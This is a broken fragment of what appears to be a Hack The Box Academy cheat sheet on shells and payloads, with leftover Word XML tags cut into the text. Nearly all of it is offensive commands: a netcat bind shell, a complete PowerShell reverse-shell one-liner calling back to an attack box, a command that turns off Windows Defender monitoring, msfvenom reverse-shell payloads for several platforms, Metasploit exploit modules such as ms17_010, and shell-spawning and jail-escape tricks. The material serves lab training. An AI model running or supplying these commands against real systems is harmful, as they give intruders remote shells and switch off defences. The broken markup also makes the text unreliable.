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45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Commands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xfreerdp /v:10.129.x.x /u:htb-student /p:HTB_@cademy_stdnt!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CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol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Works with many different command language interpreters to discover the environmental variables of a system. This is a great way to find out which shell language is in use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sudo nc -lvnp &lt;port #&gt;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Starts a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netcat</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> listener on a specified port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nc -nv &lt;ip address of computer with listener started&gt;&lt;port being listened on&gt;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Connects to a netcat listener at the specified IP address and port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rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2&gt;&amp;1 | nc -l 10.129.41.200 7777 &gt; /tmp/f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Uses netcat to bind a shell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/bin/bash</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">) the specified IP address and port. This allows for a shell session to be served remotely to anyone connecting to the computer this command has been issued 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powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"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Powershell</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> one-liner used to connect back to a listener that has been started on an attack box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Set-MpPreference -DisableRealtimeMonitoring $true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Powershell command using to disable real time monitoring in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Windows Defender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 exploit/windows/smb/psexec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Metasploit exploit module that can be used on vulnerable Windows system to establish a shell session utilizing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smb</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp;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psexec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shell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Command used in a meterpreter shell session to drop into a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system shell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msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf &gt; nameoffile.elf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MSFvenom</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> command used to generate a linux-based reverse shell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stageless payload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msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe &gt; nameoffile.exe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MSFvenom command used to generate a Windows-based reverse shell stageless payload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msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho &gt; nameoffile.macho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MSFvenom command used to generate a MacOS-based reverse shell payload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msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp &gt; nameoffile.asp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MSFvenom command used to generate a ASP web reverse shell payload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msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw &gt; nameoffile.jsp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MSFvenom command used to generate a JSP web reverse shell payload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msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war &gt; nameoffile.war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MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload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 auxiliary/scanner/smb/smb_ms17_010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Metasploit exploit module used to check if a host is vulnerable to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ms17_010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 exploit/windows/smb/ms17_010_psexec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Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17_010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 exploit/linux/http/rconfig_vendors_auth_file_upload_rce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Metasploit exploit module that can be used to optain a reverse shell on a vulnerable linux system hosting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rConfig 3.9.6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python -c 'import pty; pty.spawn("/bin/sh")'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Python command used to spawn an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interactive shell</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> on a linux-based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/bin/sh -i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Spawns an interactive shell on a linux-based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perl —e 'exec "/bin/sh";'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Uses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  <w:t xml:space="preserve"> to spawn an interactive shell on a linux-based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ruby: exec "/bin/sh"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Uses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ruby</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to spawn an interactive shell on a linux-based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Lua: os.execute('/bin/sh')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Uses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Lua</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to spawn an interactive shell on a linux-based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awk 'BEGIN {system("/bin/sh")}'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Uses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awk</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to spawn an interactive shell on a linux-based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find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;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Uses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find</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to spawn an interactive shell on a linux-based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find . -exec /bin/sh \; -quit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An alternative way to use the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find</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to spawn an interactive shell on a linux-based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vim -c ':!/bin/sh'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Uses the text-editor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VIM</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to spawn an interactive shell. Can be used to escape "jail-shells"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ls -la &lt;path/to/fileorbinary&gt;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Used to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  <w:t xml:space="preserve"> files &amp; directories on a linux-based system and shows the permission for each file in the chosen directory. Can be used to look for binaries that we have permission to execute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sudo -l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Displays the commands that the currently logged on user can run as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/usr/share/webshells/laudanum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Location of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laudanum webshells</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> on ParrotOS and Pwnbox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/usr/share/nishang/Antak-WebShell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Location of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Antak-Webshell</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> on Parrot OS and Pwnbox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Download Cheatsheet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ademy.hackthebox.com/module/cheatsheet/11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